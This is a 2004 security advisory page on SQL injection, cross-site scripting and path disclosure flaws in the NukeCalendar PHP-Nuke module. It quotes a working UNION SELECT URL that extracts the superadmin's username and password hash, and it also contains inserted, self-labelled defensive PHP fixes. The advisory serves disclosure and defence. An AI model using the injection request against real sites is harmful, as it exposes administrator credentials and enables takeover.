SecurityTracker.com
SecurityTracker Archives

Category:   Application (Calendar)  >   NukeCalendar
Vendors:   shiba-design.de
NukeCalendar Input Validation Holes Let Remote Users Inject SQL Commands and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1009711
SecurityTracker URL:  http://securitytracker.com/id/1009711
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 8 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 1.1.a
Description:   Several vulnerabilities were reported in NukeCalendar. A remote user can inject SQL commands and conduct cross-site scripting attacks. A remote user can also determine the installation path.

Janek Vind "waraxe" reported that NukeCalendar does not properly validate user-supplied input. A remote user can reportedly supply a specially crafted value for the 'eid' variable to inject an arbitrary SQL command on the underlying database. A demonstration exploit command to retrieve the superadmin's username and hashed password is provided:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null

It is also reported that a remote user can create a specially crafted POST request that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the NukeCalendar software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]

It is also reported that a remote user can supply a specially crafted request to trigger an error message that will disclose the installation path.

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar

The report indicates that other components are affected, including 'block-Calendar.php', 'block-Calendar1.php' and 'block-Calendar_center.php'.

Impact:   A remote user can inject SQL commands to retrieve information from the database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the NukeCalendar software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.
Vendor URL:  vkp.shiba.de/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=19&ttitle=nukeKalender%201.1.a
Cause:   Access control error, Exception handling error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [waraxe-2004-SA#015] - Multiple vulnerabilities in NukeCalendar

{================================================================================}
{                              [waraxe-2004-SA#015]                              }
{================================================================================}
{                                                                                }
{                [ Multiple vulnerabilities in NukeCalendar v1.1.a ]             }
{                                                                                }
{================================================================================}
                                                                                                                                
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=15


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NukeCalendar v1.1.a                                
PHP-Nuke Calendar Module for PHP-Nuke
Copyright (c) 2002 by Andi (info@shiba-design.de)
http://www.shiba-design.de
Nuke Calendar is based on EventCalendar 2.0
Copyright (c) 2001 Originally by Rob Sutton     


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure:


Let's try a request like this:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar

and we get standard error messages, revealing the full path to the nuke engine scripting files:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in D:\apache_wwwroot\nuke71\includes\sql_layer.php on line 286

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in D:\apache_wwwroot\nuke71\includes\sql_layer.php on line 494
 

Another problem is the blocks "block-Calendar.php", "block-Calendar1.php" and "block-Calendar_center.php":


http://localhost/nuke71/blocks/block-Calendar.php
http://localhost/nuke71/blocks/block-Calendar1.php
http://localhost/nuke71/blocks/block-Calendar_center.php

... and we get many error messages. By the way - blocks in phpnuke always contain protecting
code like this in block-Calendar.php:

if (eregi("block-Calendar2.php",$PHP_SELF)) {
    Header("Location: index.php");
    die();
}

But as we can see, the software author renamed the script without correcting this protecting code, so
we can call this block script directly and it will lead to a massive stream of error messages.
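The guard above fails because it names a file ("block-Calendar2.php") that no longer exists after the rename, so the check never matches and the block runs outside the engine. The following is an added example, not code from NukeCalendar or from the advisory author: a direct-access guard that compares the block's own file name with the script the web server actually executed, so it keeps working after a rename. It assumes PHP 7 or later (eregi() was removed in PHP 7) and that the block is normally included by the PHP-Nuke front controller, index.php; the function name nukecal_is_direct_request is an assumption for illustration.

```php
<?php
// Added example (not part of the original advisory or of NukeCalendar):
// a direct-access guard that does not depend on a hard-coded file name.

// Vulnerable pattern from the advisory: the guard names "block-Calendar2.php",
// but the file on disk is block-Calendar.php, so the check never matches and a
// direct request to blocks/block-Calendar.php runs the block without the
// engine's database setup, spraying warnings that reveal the installation path.
//
//   if (eregi("block-Calendar2.php", $PHP_SELF)) { Header("Location: index.php"); die(); }

// Hardened guard: when the block is included from index.php, the executed
// script is index.php and the names differ; when the block is requested
// directly, the executed script is the block file itself and the names match.
function nukecal_is_direct_request(string $thisFile, string $executedScript): bool
{
    return basename($thisFile) === basename($executedScript);
}

// Assumption: $_SERVER['SCRIPT_FILENAME'] is the script the server executed.
if (nukecal_is_direct_request(__FILE__, $_SERVER['SCRIPT_FILENAME'] ?? '')) {
    header('Location: index.php');
    exit;
}

// ... block body follows here ...
```

Because the comparison uses __FILE__ rather than a string literal, renaming the file to block-Calendar1.php or block-Calendar_center.php leaves the guard intact. A block that is included by the engine and also runs as a fallback in a different entry script would need the executed script compared against a list of allowed front controllers instead.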



2. Cross-Site Scripting aka XSS:


Example request:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]

POST request is preferred because of the restrictive filter against GET requests in mainfile.php.



3. SQL injection:

This SQL injection exploit can pull any information out of the database, for example the superadmin's username
and the MD5 hash of their password:

http://localhost/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null,null,null,null,null,null%20%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
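All three findings in the advisory (path disclosure, XSS and SQL injection) come from the same root cause: the 'eid' parameter is neither validated nor bound as a parameter, and whatever it contains is spliced into SQL and echoed back. The following is an added example, not code from NukeCalendar or from the advisory author, showing the vulnerable shape beside a hardened handler that rejects non-numeric ids before any query, binds the id in a prepared statement, escapes output and keeps PHP warnings out of the response. The table and column names (nuke_events, eid, title), the mysqli connection $db and the function names are assumptions for illustration; it assumes PHP 7 or later with the mysqlnd driver (needed for get_result()).

```php
<?php
// Added example, not code from NukeCalendar or from the advisory.
// Assumed schema: table nuke_events with integer column eid and text column title.

// --- Vulnerable shape (reconstructed from the advisory's description) ---
// $eid arrives unchecked from the request and is concatenated into SQL:
//   $result = sql_query("SELECT ... FROM nuke_events WHERE eid=$eid", $dbi);
// * eid=-1 UNION select ...  -> rows from nuke_authors come back (SQL injection)
// * eid=<script>...          -> value echoed back unescaped (reflected XSS)
// * eid=foobar               -> query fails; mysql_fetch_row() warns with the
//                               full path of sql_layer.php (path disclosure)

// --- Hardened handler ---

// Accept only a short non-negative decimal integer; everything else
// ("-1 UNION ...", "<script>", "foobar") is rejected before it reaches MySQL.
function nukecal_parse_eid($raw): ?int
{
    if (!is_string($raw) || !preg_match('/^\d{1,10}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function nukecal_view_event(mysqli $db, $raw): string
{
    $eid = nukecal_parse_eid($raw);
    if ($eid === null) {
        // Generic message, and no query is run, so no SQL warning can leak a path.
        return '<p>Invalid event id.</p>';
    }

    // Prepared statement: eid is bound as an integer, never spliced into SQL,
    // so a UNION or comment sequence in the input has no meaning to the server.
    $stmt = $db->prepare('SELECT title FROM nuke_events WHERE eid = ?');
    $stmt->bind_param('i', $eid);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    if ($row === null) {
        return '<p>No such event.</p>';
    }
    // Escape on output so neither stored nor reflected content becomes script.
    return '<h2>' . htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8') . '</h2>';
}

// Error handling: warnings are logged server-side, never rendered to the client,
// so a failed query cannot disclose installation paths even if one slips through.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Usage from the module's view branch; $db is an open mysqli connection (assumed).
// echo nukecal_view_event($db, $_REQUEST['eid'] ?? '');
```

The whitelist in nukecal_parse_eid() is deliberately stricter than intval(): intval("-1 UNION ...") would silently yield -1 and hide the attempt, whereas rejecting the value outright also gives a clean point to log the malformed request for detection. If the id must be reflected in the page (for example in an error message), pass it through htmlspecialchars() the same way the title is.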




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


Copyright 2019, SecurityGlobal.net LLC